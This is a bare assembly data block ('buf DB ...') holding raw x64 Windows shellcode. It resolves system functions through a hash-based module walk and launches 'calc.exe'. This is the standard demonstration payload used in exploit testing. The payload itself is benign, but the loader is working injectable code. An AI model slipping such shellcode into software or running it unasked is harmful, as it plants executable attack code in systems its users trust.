buf DB fch,48h,83h,e4h,f0h,e8h,c0h,00h,00h,00h,41h,51h,41h
    DB 50h,52h,51h,56h,48h,31h,d2h,65h,48h,8bh,52h,60h,48h
    DB 8bh,52h,18h,48h,8bh,52h,20h,48h,8bh,72h,50h,48h,0fh
    DB b7h,4ah,4ah,4dh,31h,c9h,48h,31h,c0h,ach,3ch,61h,7ch
    DB 02h,2ch,20h,41h,c1h,c9h,0dh,41h,01h,c1h,e2h,edh,52h
    DB 41h,51h,48h,8bh,52h,20h,8bh,42h,3ch,48h,01h,d0h,8bh
    DB 80h,88h,00h,00h,00h,48h,85h,c0h,74h,67h,48h,01h,d0h
    DB 50h,8bh,48h,18h,44h,8bh,40h,20h,49h,01h,d0h,e3h,56h
    DB 48h,ffh,c9h,41h,8bh,34h,88h,48h,01h,d6h,4dh,31h,c9h
    DB 48h,31h,c0h,ach,41h,c1h,c9h,0dh,41h,01h,c1h,38h,e0h
    DB 75h,f1h,4ch,03h,4ch,24h,08h,45h,39h,d1h,75h,d8h,58h
    DB 44h,8bh,40h,24h,49h,01h,d0h,66h,41h,8bh,0ch,48h,44h
    DB 8bh,40h,1ch,49h,01h,d0h,41h,8bh,04h,88h,48h,01h,d0h
    DB 41h,58h,41h,58h,5eh,59h,5ah,41h,58h,41h,59h,41h,5ah
    DB 48h,83h,ech,20h,41h,52h,ffh,e0h,58h,41h,59h,5ah,48h
    DB 8bh,12h,e9h,57h,ffh,ffh,ffh,5dh,48h,bah,01h,00h,00h
    DB 00h,00h,00h,00h,00h,48h,8dh,8dh,01h,01h,00h,00h,41h
    DB bah,31h,8bh,6fh,87h,ffh,d5h,bbh,f0h,b5h,a2h,56h,41h
    DB bah,a6h,95h,bdh,9dh,ffh,d5h,48h,83h,c4h,28h,3ch,06h
    DB 7ch,0ah,80h,fbh,e0h,75h,05h,bbh,47h,13h,72h,6fh,6ah
    DB 00h,59h,41h,89h,dah,ffh,d5h,63h,61h,6ch,63h,2eh,65h
    DB 78h,65h,00h
